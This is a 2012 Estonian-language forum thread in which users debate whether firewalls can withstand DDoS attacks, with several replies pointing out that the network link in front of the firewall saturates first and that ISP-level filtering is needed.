|
14.10.2012 12:02:13
|
|
|
| Tanel kirjutas: |
Ja mis enne su tulemüüri toimub? Liiklus kaob iseenesest ära, kuna tulemüüris on blokeering peale pandud?  |
Jah, liiklus langeb ohutule tasemele. Üldiselt korralike seadmetega kaitstud asutuste servereid ei võta laste rünnakud maha. Kasvõi Pentagon või CIA.
| LKits kirjutas: |
Reaalselt tulemüüril nende pakettide filtreerimine võtab ressurssi ja olen kindel, et isegi parimad tulemüürid jooksevad tuhandete ilusate pakettide analüüsimisel kokku. |
Ei jookse.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Tanel
HV Guru
liitunud: 01.10.2001
|
|
| Kommentaarid: 463 loe/lisa |
Kasutajad arvavad: |
|
:: |
5 :: |
7 :: |
360 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 12:04:37
|
|
|
| Tanel kirjutas: |
| vaegkuulja kirjutas: |
| Tanel kirjutas: |
Ja mis enne su tulemüüri toimub? Liiklus kaob iseenesest ära, kuna tulemüüris on blokeering peale pandud? |
Jah, liiklus langeb ohutule tasemele. Üldiselt korralike seadmetega kaitstud asutuste servereid ei võta laste rünnakud maha. Kasvõi Pentagon või CIA. |
Et tulemüür lihtsalt ütleb paketile, et ära sina mind enam külasta ja paha pakett enam ei külastagi?
Mõtle nüüd ometi peaga. |
Ma arvan et mõtlemisega peaksid ikka need alustama keda on laste poolt rünnatud ja lolliks tehtud.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Tanel
HV Guru
liitunud: 01.10.2001
|
|
| Kommentaarid: 463 loe/lisa |
Kasutajad arvavad: |
|
:: |
5 :: |
7 :: |
360 |
|
| tagasi üles |
|
|
Some
HV vaatleja
liitunud: 07.11.2001
|
|
14.10.2012 12:07:22
|
|
|
| LKits kirjutas: |
| Tanel kirjutas: |
| vaegkuulja kirjutas: |
| LKits kirjutas: |
Ehk siis tulemüür võtab ise lehekülje maha, sest too on ju rünnaku all ja rünnaku enda eesmärk on lehekülg maha saada.
Mission accomplished?
|
Miks peaks tulemüür lehekülge maha võtma? Ei, ta võtab maha ainult sinu IP. |
Ja mis enne su tulemüüri toimub? Liiklus kaob iseenesest ära, kuna tulemüüris on blokeering peale pandud? |
Reaalselt tulemüüril nende pakettide filtreerimine võtab ressurssi ja olen kindel, et isegi parimad tulemüürid jooksevad tuhandete ilusate pakettide analüüsimisel kokku. |
No vaegkuulja lemmiksüsteem saab kuni 140Gbit/s liikluse filtreerimisega hakkama http://www.checkpoint.com/products/ias-bladed-hardware/index.html
Probleem on et selleks, et midagi filtreerida peab toru sinnani piisavalt läbi laskma. Nõrgim lüli annab järele.
|
|
| Kommentaarid: 12 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
9 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 12:18:18
|
|
|
| Tanel kirjutas: |
| vaegkuulja, sa ei vastanud mu küsimusele |
Jah, paketid milledele vastust ei tule, koormavad võrku vähem. Esiteks jääb ainult download müüri poolt vaadates ning teiseks kui paketile vastust ei tule, siis jäädakse ootama ega tarvitseta alati kohe järgmist paketti saata, juhul kui tegemist kõrgema layeri paketiga. Samuti ei käsi keegi võtta ainult ühe ISP teenuse ja veel kõige aeglasema.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Tanel
HV Guru
liitunud: 01.10.2001
|
|
14.10.2012 12:20:11
|
|
|
| vaegkuulja kirjutas: |
| Tanel kirjutas: |
| vaegkuulja, sa ei vastanud mu küsimusele |
Jah, paketid milledele vastust ei tule, koormavad võrku vähem. Esiteks jääb ainult download müüri poolt vaadates ning teiseks kui paketile vastust ei tule, siis jäädakse ootama ega tarvitseta alati kohe järgmist paketti saata, juhul kui tegemist kõrgema layeri paketiga. Samuti ei käsi keegi võtta ainult ühe ISP teenuse ja veel kõige aeglasema. |
See vastus tuleks kuldvarasse raiuda 
Krt mulle hakkab järjest enam meeldima mõte, et rank siduda AM postituspiiranguga 
_________________
Erakopeerimistasu tõstmise ettepaneku tagasilükkamine
Hinnavaatlus.ee - leia parim hind!
HV-s ID-kaardiga autentimine |
|
| Kommentaarid: 463 loe/lisa |
Kasutajad arvavad: |
|
:: |
5 :: |
7 :: |
360 |
|
| tagasi üles |
|
|
mikk36
HV Guru
liitunud: 21.02.2004
|
|
14.10.2012 12:21:02
|
|
|
| vaegkuulja, kui eesmärk on rünnata, siis ei huvitagi rünnaku tegijat paketi vastuse saamine, vaid saadetakse tuimalt üle ja üle päringuid. Kogu koormus tekitataksegi tulemüüri poolt vaadates download suunal ja selle kanali umbes hoidmisega hoitaksegi võrguteenus maas.
|
|
| Kommentaarid: 85 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
2 :: |
78 |
|
| tagasi üles |
|
|
Tanel
HV Guru
liitunud: 01.10.2001
|
|
| Kommentaarid: 463 loe/lisa |
Kasutajad arvavad: |
|
:: |
5 :: |
7 :: |
360 |
|
| tagasi üles |
|
|
LKits
HV Guru
liitunud: 06.09.2007
|
|
| Kommentaarid: 13 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
13 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 12:29:30
|
|
|
| mikk36 kirjutas: |
| vaegkuulja, kui eesmärk on rünnata, siis ei huvitagi rünnaku tegijat paketi vastuse saamine, vaid saadetakse tuimalt üle ja üle päringuid. Kogu koormus tekitataksegi tulemüüri poolt vaadates download suunal ja selle kanali umbes hoidmisega hoitaksegi võrguteenus maas. |
Kõrgema layeri puhul on alati tarvis vastust enne järgmist protseduuri, kasvõi autentimine. Just neile pannakse rõhku selleks et vältida serverisse sissemurdmisi ja andmete vargusi, arvestades ka sellega et opsüsteemile pole värskendusi tehtud ja kaitsta on ka siis tarvis. DDOS ründed on üldse kõige labasemad, need ongi laste teema. DDOS ründe jaoks peab müüril olema piisavalt jõudlust.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:]
viimati muutis vaegkuulja 14.10.2012 12:30:35, muudetud 1 kord |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Tanel
HV Guru
liitunud: 01.10.2001
|
|
14.10.2012 12:31:31
|
|
|
vaegkuulja, loe nüüd miku teine lause uuesti läbi 
Keegi ei räägigi siin autentimisest või pakettide analüüsist (mida tulemüür peabki tegema), jutt käib sellest kui su toru enne tulemüüri umbe tõmmatakse, et välismaailma jaoks su veebileht maas tundub olema. Ja soovitus toru mahu suurendamiseks (küberrünnakute puhuks) on tragikoomiline Sa ikka tead kui palju maksavad korralikud kiired ühendused ning kui palju maksab korralik tulemüür või tulemüüride süsteem? Selliseid võimsaid süsteeme saavad lihtsustatult öeldes lubada endale vaid strateegilise tähtsusega riigiasutused ja rikkad eraasutused (näiteks pangad).
Lihtsate veebilehtede omanike (kellel pole seda pappi, et võimsat infrastruktuuri soetada) jaoks on lahendus vaid ISP-ide tasemel, kui analüüsivad pakette ja keelavad või piiravad taolist liiklust oma võrgus.
_________________
Erakopeerimistasu tõstmise ettepaneku tagasilükkamine
Hinnavaatlus.ee - leia parim hind!
HV-s ID-kaardiga autentimine
viimati muutis Tanel 14.10.2012 12:38:47, muudetud 1 kord |
|
| Kommentaarid: 463 loe/lisa |
Kasutajad arvavad: |
|
:: |
5 :: |
7 :: |
360 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 12:35:01
|
|
|
| Tanel kirjutas: |
vaegkuulja, loe nüüd miku teine lause uuesti läbi
Keegi ei räägigi siin autentimisest või pakettide analüüsist (mida tulemüür peabki tegema), jutt käib sellest kui su toru enne tulemüüri umbe tõmmatakse, et välismaailma jaoks su veebileht maas tundub olema. |
Aga selleks ongi vaja rohkem torusid ja suuremat läbilskevõimet. Ma varem just mainisingi et mitme toru korraga kasutamine ongi hea tulemüüri võimalus ja CheckPointil on see võimalus olemas.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
KohviPaus
Kreisi kasutaja
liitunud: 29.01.2012
|
|
14.10.2012 12:38:22
|
|
|
Mis see tüüp räägib tõsiselt või? 
|
|
| Kommentaarid: 14 loe/lisa |
Kasutajad arvavad: |
|
:: |
1 :: |
1 :: |
12 |
|
| tagasi üles |
|
|
|
:: KKK
:: otsing 
:: statistika
:: kasutajate nimekiri
:: kasutajate grupid
:: registreeri
teata moderaatorile
Spoiler 
